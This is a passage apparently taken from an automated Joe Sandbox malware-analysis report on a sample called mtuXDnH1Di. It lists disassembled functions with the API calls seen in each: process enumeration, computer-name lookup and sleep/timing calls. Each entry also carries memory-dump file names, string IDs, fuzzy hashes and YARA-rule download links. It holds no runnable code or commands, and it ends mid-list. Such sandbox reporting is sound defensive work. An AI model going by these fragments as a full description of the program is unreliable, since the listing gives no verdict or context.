                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB $}$
                                                                                                                                                                                                            • API String ID: 2164215191-3602920818
                                                                                                                                                                                                            • Opcode ID: bd3704033cc7f82c0a961be74820690f9b60e91924dad0054261ad1bd9bc782e
                                                                                                                                                                                                            • Instruction ID: 765e2a9f2acaf89155237627480628b436d4ba662941e2424be251b14029a41f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd3704033cc7f82c0a961be74820690f9b60e91924dad0054261ad1bd9bc782e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA51EC76A1560CCFD308DF69FD895263BF2F7A53203014115E986D72B4EBB488A0FB85
                                                                                                                                                                                                            Function 00ED2120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED21D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00ED2257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00ED2384
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ED2426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            • Opcode ID: 8de0e581005b55fb8bf2f9f1a695af12dcf37754eb8fe65ba9ad98ae15d4d886
                                                                                                                                                                                                            • Instruction ID: d20da305f84c8c89875634466f27b0827bc64a6296ca5487741141a7666023ed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8de0e581005b55fb8bf2f9f1a695af12dcf37754eb8fe65ba9ad98ae15d4d886
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC9125B1A0131CCFD710DF25FC886A537B6FBA0320F15801AD942A22B4EB7499A6FF55
                                                                                                                                                                                                            Function 00ECE550 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 521COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ${mYr
                                                                                                                                                                                                            • API String ID: 0-2876023986
                                                                                                                                                                                                            • Opcode ID: cf414f53df31c1998e730feea7a9970b28ea201115dabeafe609a10f3b893afe
                                                                                                                                                                                                            • Instruction ID: 08fbd8687f5d635e050320b5166275db806c9cf85e92e4563ad685388e36ba89
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf414f53df31c1998e730feea7a9970b28ea201115dabeafe609a10f3b893afe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63222675A0020DCFC704EF24FE81A7637F6F794321B00812AE945A63B5EB759856EB91
                                                                                                                                                                                                            Function 00EDF160 Relevance: 4.9, Strings: 3, Instructions: 1183COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $C@% $t?Wx
                                                                                                                                                                                                            • API String ID: 0-2869517708
                                                                                                                                                                                                            • Opcode ID: 62a031e75935b5c04bc132a3ed8e28a3a5af0ca7165661a8464ae4b985f1e9f0
                                                                                                                                                                                                            • Instruction ID: 4e0880652cd1c6a497a41d40c8c1d16118d5f3de37a59e28d25b832865751589
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a031e75935b5c04bc132a3ed8e28a3a5af0ca7165661a8464ae4b985f1e9f0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BB24375A0020DCFCB04DF65FD855A977F2FB98320715811AD842A73B4EB7499A2EF80
                                                                                                                                                                                                            Function 00EE55E0 Relevance: 4.1, Strings: 2, Instructions: 1592COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: l$p R
                                                                                                                                                                                                            • API String ID: 0-2271698361
                                                                                                                                                                                                            • Opcode ID: 7aa7aa6c3cd3af6b6db58d4cb1a54ce8823498b0a65a238e4c21a5de8fc932cf
                                                                                                                                                                                                            • Instruction ID: 37eeeb1a805bff7afd814a90d26be99e3c459dcf277c4d04976e624e0cc7dcc7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7aa7aa6c3cd3af6b6db58d4cb1a54ce8823498b0a65a238e4c21a5de8fc932cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57E267B5A0064DCFC704DF26FD851A93BB2F7A5360712801AD882E72B4E77488A5FF85
                                                                                                                                                                                                            Function 00EDE1C0 Relevance: 3.7, APIs: 2, Instructions: 732COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3300348e49dc20250f9251706d8ae2e06ffa62cde23a70230bff88acc59b0d1c
                                                                                                                                                                                                            • Instruction ID: 1b36b70668174866a7d084d29e63dd59c7d11bbbc5b85db2b4588cfbe351824a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3300348e49dc20250f9251706d8ae2e06ffa62cde23a70230bff88acc59b0d1c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 486235B5A0020DCFD714EF25FD896653BF2FB90310B21901AE942AB3B5EB315856EF81
                                                                                                                                                                                                            Function 00ED30F0 Relevance: 2.3, Strings: 1, Instructions: 1008COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: +#T
                                                                                                                                                                                                            • API String ID: 0-666610905
                                                                                                                                                                                                            • Opcode ID: 422c876e055d41d0b02bdadc8726d90ad7b3274a0ab25eddf13e6db2f4b69a27
                                                                                                                                                                                                            • Instruction ID: 91ff3235ded36b306e67d7bf0c2d222f5f3610f7a08c46412a72126810ec7bbb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 422c876e055d41d0b02bdadc8726d90ad7b3274a0ab25eddf13e6db2f4b69a27
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA9256B6A0020DDFCB04DF25FD855AA3BB5FB94310B11551AE842B3374E7309A66EF92
                                                                                                                                                                                                            Function 00EE9B00 Relevance: 2.2, APIs: 1, Instructions: 701COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000010), ref: 00EE9C49
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3545744682-0
                                                                                                                                                                                                            • Opcode ID: 484b53b6e741d3e81c12055320c2ad313c823d89d69ec2581c0741edf8eda33b
                                                                                                                                                                                                            • Instruction ID: fef05058d4739fb4a08e9eba1296b223252e6c273f74f35722525bbcd662f958
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 484b53b6e741d3e81c12055320c2ad313c823d89d69ec2581c0741edf8eda33b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C62227590020DCFC704EF60FD92AB937B5FBA4310F10906AE546A32B5EB706A99EF51
                                                                                                                                                                                                            Function 00EEE70B Relevance: 2.0, Strings: 1, Instructions: 773COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Bzb
                                                                                                                                                                                                            • API String ID: 0-2804807757
                                                                                                                                                                                                            • Opcode ID: d5a29f0763e1f5b484e8d8e9f5f87992b5662648d034601d0e82c43a36932234
                                                                                                                                                                                                            • Instruction ID: fe84be1d4fd83e1ee81bae1077240034114e20fb0505da534d128802b78f8914
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5a29f0763e1f5b484e8d8e9f5f87992b5662648d034601d0e82c43a36932234
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D72FC7AA1121DCFC754DF29FD851613BF2FB983603168016D881E72B1E734A8A5EF85
                                                                                                                                                                                                            Function 00EE22A0 Relevance: 1.8, APIs: 1, Instructions: 598sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00EF08B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EF0929
                                                                                                                                                                                                              • Part of subcall function 00EF08B0: __aulldiv.LIBCMT ref: 00EF0953
                                                                                                                                                                                                              • Part of subcall function 00ED1200: Sleep.KERNEL32(000003E8), ref: 00ED139B
                                                                                                                                                                                                            • Sleep.KERNEL32(000008AE), ref: 00EE2C03
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: SleepTime$FileSystem__aulldiv
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3227937447-0
                                                                                                                                                                                                            • Opcode ID: 61606da5c4849da9fc251addb2e9cb328ff9ab8ab32e6d23ef5046e66d91c21d
                                                                                                                                                                                                            • Instruction ID: 5c3be1a85f3c9be32783f53c31263d8d0945b558e1edbe80245eff6fce752527
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61606da5c4849da9fc251addb2e9cb328ff9ab8ab32e6d23ef5046e66d91c21d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63425575A0020CCFD704DF61FD92ABA3BB6FB94320F11815AE542A32B4EB3459A5EF51
                                                                                                                                                                                                            Function 00EE66E7 Relevance: 1.8, Strings: 1, Instructions: 554COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gZ
                                                                                                                                                                                                            • API String ID: 0-129470356
                                                                                                                                                                                                            • Opcode ID: 060766898e97797508cae85bb6ef1643ae9bccf0b660e32366c9c238a65948a4
                                                                                                                                                                                                            • Instruction ID: 56deae6b1e5f7e6f96d7ed5367bed3b53b468e6a5b753cb805a7e0086f7d01e1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 060766898e97797508cae85bb6ef1643ae9bccf0b660e32366c9c238a65948a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D326975A0020DCFC704DF26FD851683BB2FBA43607229116D885E72B9EB3598A5FF81
                                                                                                                                                                                                            Function 00ECD760 Relevance: 1.7, Strings: 1, Instructions: 473COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: viH
                                                                                                                                                                                                            • API String ID: 0-3523788874
                                                                                                                                                                                                            • Opcode ID: 77a86b583fb01dbcface5edcde623038514373f2fe83428ad6c6d47c2647aaf8
                                                                                                                                                                                                            • Instruction ID: 08904d66b1c574cfd1b08fb8c25bca6fe9e2804949a80a4c147a5e6775b31805
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77a86b583fb01dbcface5edcde623038514373f2fe83428ad6c6d47c2647aaf8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C124676A0420DCFC704EF25FD81A7937F6FBE4320711802AE846A7275EB758856EB91
                                                                                                                                                                                                            Function 00EF0A90 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: DH@
                                                                                                                                                                                                            • API String ID: 0-2158797763
                                                                                                                                                                                                            • Opcode ID: de3ec833a0800e9c5c38fd6e29b34485b855036ad65d9dde5cb5155ae124deea
                                                                                                                                                                                                            • Instruction ID: 39b90410948e521df87a8812eabd87321667fd5c24a3e3c52ba57d78ac530568
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de3ec833a0800e9c5c38fd6e29b34485b855036ad65d9dde5cb5155ae124deea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D1F07A60520CCFC744CF29FD851657BB2FBA5320756811AD880A73B6EB389852FB51
                                                                                                                                                                                                            Function 00EF5930 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
